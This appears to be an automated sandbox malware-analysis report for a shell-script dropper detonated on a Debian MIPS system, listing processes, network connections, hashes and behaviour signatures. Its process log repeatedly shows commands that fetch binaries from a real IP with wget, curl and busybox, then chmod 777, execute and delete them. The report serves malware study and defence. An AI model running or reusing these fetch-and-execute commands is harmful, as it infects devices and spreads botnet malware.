[curl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/chmod

[chmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC

[./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/rm

[rm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/wget

[wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/chmod

[chmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL

[./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/rm

[rm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/wget

[wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/chmod

[chmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P

[./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/rm

[rm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/wget

[wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/chmod

[chmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe

[./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/rm

[rm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/wget

[wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/chmod

[chmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy

[./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/rm

[rm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/wget

[wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/chmod

[chmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu

[./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/rm

[rm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/wget

[wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/chmod

[chmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f

[./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/rm

[rm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/wget

[wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/chmod

[chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF

[./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/rm

[rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/wget

[wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/chmod

[chmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB

[./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/rm

[rm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/wget

[wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/chmod

[chmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av

[./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/rm

[rm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/wget

[wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/chmod

[chmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC

[./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/rm

[rm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/chmod

[chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

[./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/rm

[rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/wget

[wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/chmod

[chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

[./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/rm

[rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/wget

[wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/chmod

[chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

[./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/rm

[rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/wget

[wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/chmod

[chmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL

[./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/rm

[rm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/wget

[wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/chmod

[chmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu

[./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/rm

[rm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/wget

[wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/chmod

[chmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f

[./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/rm

[rm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/wget

[wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/764-1-0xb677a000-0xb678b044-memory.dmp

memory/785-2-0xb6741000-0xb6752044-memory.dmp

memory/816-3-0xb66f5000-0xb6706044-memory.dmp

memory/843-4-0xb6768000-0xb6779044-memory.dmp

memory/913-5-0xb676b000-0xb677c044-memory.dmp

memory/914-6-0xb675f000-0xb6770044-memory.dmp

memory/919-7-0xb676b000-0xb677c044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-25 02:54

Reported

2024-11-25 02:57

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

147s

Command Line

[/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A
N/A /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 N/A
N/A /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs N/A
N/A /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q N/A
N/A /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF N/A
N/A /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB N/A
N/A /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av N/A
N/A /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC N/A
N/A /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL N/A
N/A /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P N/A
N/A /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe N/A
N/A /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy N/A
N/A /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu N/A
N/A /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f N/A
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A
N/A /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF N/A
N/A /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB N/A
N/A /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av N/A
N/A /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC N/A
N/A /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 N/A
N/A /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs N/A
N/A /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q N/A
N/A /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL N/A
N/A /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu N/A
N/A /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /usr/bin/curl N/A
File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /usr/bin/curl N/A
File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /usr/bin/curl N/A
File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /usr/bin/curl N/A
File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /usr/bin/curl N/A
File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /usr/bin/curl N/A
File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /usr/bin/curl N/A
File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /usr/bin/curl N/A
File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /usr/bin/curl N/A
File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /usr/bin/curl N/A
File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /usr/bin/curl N/A
File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /usr/bin/curl N/A
File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /usr/bin/curl N/A
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A
File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /usr/bin/curl N/A
File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /usr/bin/curl N/A
File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /usr/bin/curl N/A
File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /usr/bin/curl N/A
File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /usr/bin/curl N/A
File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /usr/bin/curl N/A
File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /usr/bin/curl N/A
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A
File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /usr/bin/curl N/A
File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /usr/bin/curl N/A
File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /usr/bin/curl N/A

Processes

/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh

[/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/chmod

[chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

[./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/rm

[rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/wget

[wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/chmod

[chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

[./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/rm

[rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/wget

